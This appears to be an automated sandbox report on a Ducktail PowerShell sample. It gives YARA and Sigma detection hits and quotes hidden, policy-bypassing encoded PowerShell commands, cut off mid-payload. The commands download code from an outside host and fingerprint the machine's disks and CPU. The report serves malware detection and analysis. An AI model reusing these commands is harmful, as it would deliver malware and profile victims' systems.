      • 0x108d0e:$b2: ::FromBase64String(
      • 0x10baae:$b2: ::FromBase64String(
      • 0x10bbf2:$b2: ::FromBase64String(
      • 0x10bc66:$b2: ::FromBase64String(
      • 0x1123f5:$b2: ::FromBase64String(
      • 0x35ff6c:$b3: ::UTF8.GetString(
      • 0xffd99:$s1: -join
      • 0x100690:$s1: -join
      • 0x2463f8:$s1: -join
      • 0x9abe7:$s3: Reverse
      • 0xa2b8e:$s3: Reverse
      • 0xa2bad:$s3: Reverse
      • 0xa6662:$s3: Reverse
      • 0xa66a7:$s3: Reverse
      • 0xaf408:$s3: Reverse
      • 0xaf421:$s3: Reverse
      • 0xb2fa5:$s3: Reverse
      • 0x1994cd:$s3: Reverse
      • 0x1994d5:$s3: Reverse
      • 0x1c9c21:$s3: reverse
      SourceRuleDescriptionAuthorStrings
      amsi64_7368.amsi.csvJoeSecurity_Ducktail_12Yara detected DucktailJoe Security
        amsi64_7368.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
        • 0xc5b7:$b1: ::WriteAllBytes(
        • 0x8a34:$b2: ::FromBase64String(
        • 0xb7d5:$b2: ::FromBase64String(
        • 0xb91a:$b2: ::FromBase64String(
        • 0x528:$b3: ::UTF8.GetString(
        • 0x8687:$s1: -join
        • 0x238:$s4: +=
        • 0x25b:$s4: +=
        • 0x1e33:$s4: +=
        • 0x1ef5:$s4: +=
        • 0x611c:$s4: +=
        • 0x8239:$s4: +=
        • 0x8523:$s4: +=
        • 0x8669:$s4: +=
        • 0xbad1:$s4: +=
        • 0xbcce:$s4: +=
        • 0xdf7e:$s4: +=
        • 0x65a2c:$s4: +=
        • 0x65aac:$s4: +=
        • 0x65b72:$s4: +=
        • 0x65bf2:$s4: +=

        System Summary

        barindex
        Source: Process startedAuthor: pH-T (Nextron Systems), Harjot Singh, @cyb3rjy0t: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgB
        Source: Process startedAuthor: Christian Burkard (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -ExecutionPolicy bypass -EncodedCommand ZgB1AG4AYwB0AGkAbwBuACAARwBlAHQALQBJAGQAZQBuAHQAaQB0AHkAewAKACAAIAAgACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACAAPQAgAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIAAtAEMAbABhAHMAcwAgAFcAaQBuADMAMgBfAEQAaQBzAGsARAByAGkAdgBlACAAfAAgAFcAaABlAHIAZQAtAE8AYgBqAGUAYwB0ACAAewAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACIAIAAtAG8AcgAgACQAXwAuAE0AZQBkAGkAYQBUAHkAcABlACAALQBlAHEAIAAiAEYAaQB4AGUAZAAgAGgAYQByAGQAIABkAGkAcwBrACAAbQBlAGQAaQBhACAALQAgAFMAUwBEACIAIAB9AAoAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAA9ACAAQAAoACkACgBmAG8AcgBlAGEAYwBoACAAKAAkAGgAYQByAGQARAByAGkAdgBlACAAaQBuACAAJABoAGEAcgBkAEQAcgBpAHYAZQBzACkAIAB7AAoAIAAgACAAIAAkAHMAZQByAGkAYQBsAE4AdQBtAGIAZQByACAAPQAgACQAaABhAHIAZABEAHIAaQB2AGUALgBTAGUAcgBpAGEAbABOAHUAbQBiAGUAcgAKACAAIAAgACAAJABtAG8AZABlAGwAIAA9ACAAJABoAGEAcgBkAEQAcgBpAHYAZQAuAE0AbwBkAGUAbAAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwAgAD0AIAAiAFMAZQByAGkAYQBsACAATgB1AG0AYgBlAHIAOgAgACQAcwBlAHIAaQBhAGwATgB1AG0AYgBlAHIALAAgAE0AbwBkAGUAbAA6ACAAJABtAG8AZABlAGwAIgAKACAAIAAgACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAArAD0AIAAkAGQAcgBpAHYAZQBJAG4AZgBvAAoAfQAKACQAYwBvAG0AYgBpAG4AZQBkAEkAbgBmAG8AIAA9ACAAJABkAHIAaQB2AGUASQBuAGYAbwBBAHIAcgBhAHkAIAAtAGoAbwBpAG4AIAAiAGAAcgBgAG4AIgAKACQAYwBwAHUASQBuAGYAbwAgAD0AIABHAGUAdAAtAFcAbQBpAE8AYgBqAGUAYwB0ACAALQBDAGwAYQBzAHMAIABXAGkAbgAzADIAXwBQAHIAbwBjAGUAcwBzAG8AcgAKACQAYwBwAHUARABlAHQAYQBpAGwAcwAgAD0AIAAiAFAAcgBvAGMAZQBzAHMAbwByAEkAZAA6ACAAJAAoACQAYwBwAHUASQBuAGYAbwAuAFAAcgBvAGMAZQBzAHMAbwByAEkAZAApACwAIABOAGEAbQBlADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATgBhAG0AZQApACwAIABNAGEAeABDAGwAbwBjAGsAUwBwAGUAZQBkADoAIAAkACgAJABjAHAAdQBJAG4AZgBvAC4ATQBhAHgAQwBsAG8AYwBrAFMAcABlAGUAZAApACwAIABVAG4AaQBxAHUAZQBJAGQAOgAgACQAKAAkAGMAcAB1AEkAbgBmAG8ALgBVAG4AaQBxAHUAZQBJAGQAKQAiAAoAJABhAGwAbABJAG4AZgBvACAAPQAgACIAJABjAG8AbQBiAGkAbgBlAGQASQBuAGYAbwBgAHIAYABuACQAYwBwAHUARABlAHQAYQBpAGwAcwAiAAoAJABtAGQANQAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAE0ARAA1AEMAcgB5AHAAdABvAFMAZQByAHYAaQBjAGUAUAByAG8AdgBpAGQAZQByAAoAJABiAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AEIAeQB0AGUAcwAoACQAYQBsAGwASQBuAGYAbwApAAoAJABoAGEAcwBoAEIAeQB0AGUAcwAgAD0AIAAkAG0AZAA1AC4AQwBvAG0AcAB1AHQAZQBIAGEAcwBoACgAJABiAHkAdABlAHMAKQAKACQAaABhAHMAaAAgAD0AIABbAEIAaQB0AEMAbwBuAHYAZQByAHQAZQByAF0AOgA6AFQAbwBTAHQAcgBpAG4AZwAoACQAaABhAHMAaABCAHkAdABlAHMAKQAgAC0AcgBlAHAAbABhAGMAZQAgACcALQAnAAoAIAAgACAAIAByAGUAdAB1AHIAbgAgACQAaABhAHMAaAA7AAoAfQAKAGMAZAAgACIAQwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAIgA7AAoAJAB0AGUAcwB0ACAAPQAgAEcAZQB0AC0ASQBkAGUAbgB0AGkAdAB5ADsACgAkAHQAZQBzAHQAIAB8ACAATwB1AHQALQBGAGkAbABlACAALQBGAGkAbABlAFAAYQB0AGgAIAAiAGQAZQB2AGkAYwBlAEkAZAAuAHQAeAB0ACIAIAAtAEUAbgBjAG8AZABpAG4AZwAgAFUAVABGADgA, CommandLine: "powershell.exe" -NoLogo -NoProfile -WindowStyle Hidden -Execution
        Source: Process startedAuthor: Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, Anton Kutepov, oscd.community: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgB
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAJABiAG8AZAB5ACAAPQAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0ATQBlAHQAaABvAGQAIABQAG8AcwB0ACAALQBIAGUAYQBkAGUAcgBzACAAJABoAGUAYQBkAGUAcgBzACAALQBCAG8AZAB5ACAAJABiAG8AZAB5AA0ACgAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAGMAYQB0AGMAaAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAADQAKAH0ADQAKAA0ACgB3AGgAaQBsAGUAKAAkAGMAbwB1AG4AdAAgAC0AZwB0ACAAMAApAA0ACgB7AA0ACgAJAA0ACgAJAHQAcgB5AHsADQAKACAAIAAgACAAIAAgACAAIABTAGUAbgBkACAAIgBiAGUAZwBpAG4AIABkAG8AdwBuAGwAbwBhAGQAIAAkAHUAcgBpACIAOwANAAoACQAJACQAYwBvAG4AdABlAG4AdAAgAD0AIABJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAJAB1AHIAaQAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcAOwANAAoAIAAgACAAIAAgACAAIAAgACQAYgB5AHQAZQBBAHIAcgBhAHkAIAA9ACAAJABjAG8AbgB0AGUAbgB0AC4AYwBvAG4AdABlAG4AdAA7AA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAIAAoACQAaQAgAD0AIAAwADsAIAAkAGkAIAAtAGwAdAAgACQAYgB5AHQAZQBBAHIAcgBhAHkALgB
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_4.ca.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_4.ca.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_4.ca.ps1", ProcessId: 7120, ProcessName: powershell.exe
        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkwqtvat\pkwqtvat.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkwqtvat\pkwqtvat.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\kingsmaker_4.ca.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7120, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pkwqtvat\pkwqtvat.cmdline", ProcessId: 7112, ProcessName: csc.exe
        Source: Process startedAuthor: frack113: Data: Command: powershell.exe -WindowStyle hidden -NoLogo -NoProfile -ExecutionPolicy bypass -EncodedCommand JAB1AHIAaQAgAD0AIAAiAGgAdAB0AHAAcwA6AC8ALwBrAGkAbgBnAHMAbQBhAGsAZQByAC4AYwBhAC8AZgBpAGwAZQAyAC8AMwA3AGUAMgBhADUANwA2ADcAOAAxAGYANgAwAGUAYQBlAGEANQA1AGUAMwA3ADkAYgBlADYAYQBlADAAMAA3ADcANgA0ADEAYgAzADkAZgA1ADkAMAA3ADkAMgA0AGQAOAA1ADIANAAyADQAMQBlADIAOQBiADcAYQA1ADMAYQA2ADEAMwBiADMAZAAzADcAZgA5ADAAZQAwADAANQBlADEAMQBiADkANgBkADYAMQAxADcANgAyADkAMAA0ADYAOQA5ADAAYwAxAGQAZgA3ADkAYQBhADkANwAzADUAMgA4ADkAMwAwADgAYwAxAGIAMgBmAGEAOQBlAGQAZQBlAGEANABkAGMANQBmAGUANQBhADAAOQBiAGYAOQBiADIANwA3ADMAZQBlAGEAZgA5ADAAOQA1ADAAYgA2ADkANgBmAGUAMQAwAGMAYwA5AGQAYgAzADcANAA1AGIANQAxADUAMQBlADQAYgAwADAAMABhADcAOQAxADIAMQAzAGMAZgA5ADMAZgAyADUAMAA3ADAAZgA1ADgAOQBiADQAMABmAGQAMwBlADMAOQBjADQAYQAxADgAZQBkAGEAZAAyACIAOwANAAoAJABjAG8AdQBuAHQAIAA9ACAAMQAwADAAOwANAAoADQAKAA0ACgANAAoAZgB1AG4AYwB0AGkAbwBuACAAUwBlAG4AZAAgAHsADQAKACAAIAAgACAAcABhAHIAYQBtACgAIABbAFAAUwBPAGIAagBlAGMAdABdACAAJABsAG8AZwBNAHMAZwAgACkADQAKAA0ACgAgACAAIAAgACMAIABDAG8AbgB2AGUAcgB0ACAAYgBvAGQAeQAgAHQAbwAgAHMAdAByAGkAbgBnAA0ACgAgACAAIAAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQAgAD0AIABbAHMAdAByAGkAbgBnAF0AKAAkAGwAbwBnAE0AcwBnACAAfAAgAEMAbwBuAHYAZQByAHQAVABvAC0ASgBzAG8AbgApADsADQAKACAAIAAgACAAJABsAG8AZwBNAGUAcwBzAGEAZwBlAHMAIAA9ACAAQAAoACkAOwANAAoAIAAgACAAIAAkAGwAbwBnAE0AZQBzAHMAYQBnAGUAcwAgACsAPQAgACQAcwB0AHIAaQBuAGcAQgBvAGQAeQA7AA0ACgAgACAAIAAgACQAbABvAGcATQBlAHMAcwBhAGcAZQBzACAAKwA9ACAAIgAtAC0ALQAtAC0ALQAtAC0ALQAtACIAOwANAAoADQAKACAAIAAgACAAJABoAGUAYQBkAGUAcgBzACAAPQAgAEAAewB9ADsADQAKACAAIAAgACAAJABrAGUAeQAgAD0AIAAiAEMAbwBuAHQAZQBuAHQALQBUAHkAcABlACIAOwANAAoAIAAgACAAIAAkAHYAYQBsAHUAZQAgAD0AIAAiAGEAcABwAGwAaQBjAGEAdABpAG8AbgAvAGoAcwBvAG4AIgA7AA0ACgANAAoAIAAgACAAIAAkAGgAZQBhAGQAZQByAHMAWwAkAGsAZQB5AF0AIAA9ACAAJAB2AGEAbAB1AGUAOwANAAoAIAAgACAAIAAkAHUAcgBpACAAPQAgACIATABPAEcAVQBSAEwAIgA7AA0ACgAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAewANAAoAIAAgACAAIAAg